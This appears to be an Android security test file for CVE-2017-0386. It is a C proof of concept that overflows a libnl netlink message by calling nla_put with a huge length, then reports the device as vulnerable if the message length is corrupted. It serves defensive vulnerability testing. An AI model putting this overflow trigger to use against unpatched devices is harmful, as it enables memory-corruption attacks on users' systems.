1 /**
2 * Copyright (C) 2019 The Android Open Source Project
3 *
4 * Licensed under the Apache License, Version 2.0 (the "License");
5 * you may not use this file except in compliance with the License.
6 * You may obtain a copy of the License at
7 *
8 * http://www.apache.org/licenses/LICENSE-2.0
9 *
10 * Unless required by applicable law or agreed to in writing, software
11 * distributed under the License is distributed on an "AS IS" BASIS,
12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 * See the License for the specific language governing permissions and
14 * limitations under the License.
15 */
16 #define _GNU_SOURCE
17
18 #define LOG_TAG "CVE-2017-0386"
19
20 #include <sys/wait.h>
21 #include <sys/types.h>
22 #include <stdio.h>
23 #include <log/log.h>
24 #include <netlink/msg.h>
25 #include <netlink/netlink.h>
26 #include <netlink-private/object-api.h>
27 #include <netlink-private/types.h>
28 #include <netlink/object.h>
29 #include <netlink/attr.h>
30
31 #include "../includes/common.h"
32
main(void)33 int main(void) {
34 struct nl_msg *message = NULL;
35 struct nlmsghdr *hdr;
36 char *data = NULL;
37 uint32_t result = 0;
38 int ret = EXIT_SUCCESS;
39 int pagesize = getpagesize();
40 size_t payloadlength = pagesize + 12 - 0x30;
41 size_t payload2length = pagesize;
42
43 message = nlmsg_alloc();
44 if (message == NULL) {
45 ALOGE("Alloc message memory failed");
46 return EXIT_FAILURE;
47 }
48
49 ALOGI("nl_msg.nm_size : %zx\n", message->nm_size);
50 hdr = message->nm_nlh;
51
52 //allocate memory for data with payloadlength
53 data = malloc(payloadlength);
54 if (data == NULL) {
55 ALOGE("Alloc data memory failed");
56 nlmsg_free(message);
57 return EXIT_FAILURE;
58 }
59
60 memset(data, 0x41, payloadlength);
61 nla_put(message, 0x4444, payloadlength, data);
62 result = hdr->nlmsg_len;
63 ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
64 ALOGI("message len = 0x%x", result);
65
66 free(data);
67 data = NULL;
68
69 //allocate memory for data with payload2length
70 data = malloc(payload2length);
71 if (data == NULL) {
72 ALOGE("Alloc data2 memory failed");
73 nlmsg_free(message);
74 return EXIT_FAILURE;
75 }
76 memset(data, 0x33, payload2length);
77 ALOGI("\n\n\nPutting down overflow.......\n\n\n");
78 nla_put(message, 0x8888, 0xFFFFF000, data);
79
80 ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr));
81 ALOGI("message len = 0x%x", hdr->nlmsg_len);
82
83 /*
84 * return 113 error code if length is mismatch
85 */
86 if(result != hdr->nlmsg_len) {
87 ret = EXIT_VULNERABLE;
88 }
89
90 if(!data) {
91 free(data);
92 data = NULL;
93 }
94
95 if(!message) {
96 nlmsg_free(message);
97 message = NULL;
98 }
99 return ret;
100 }
101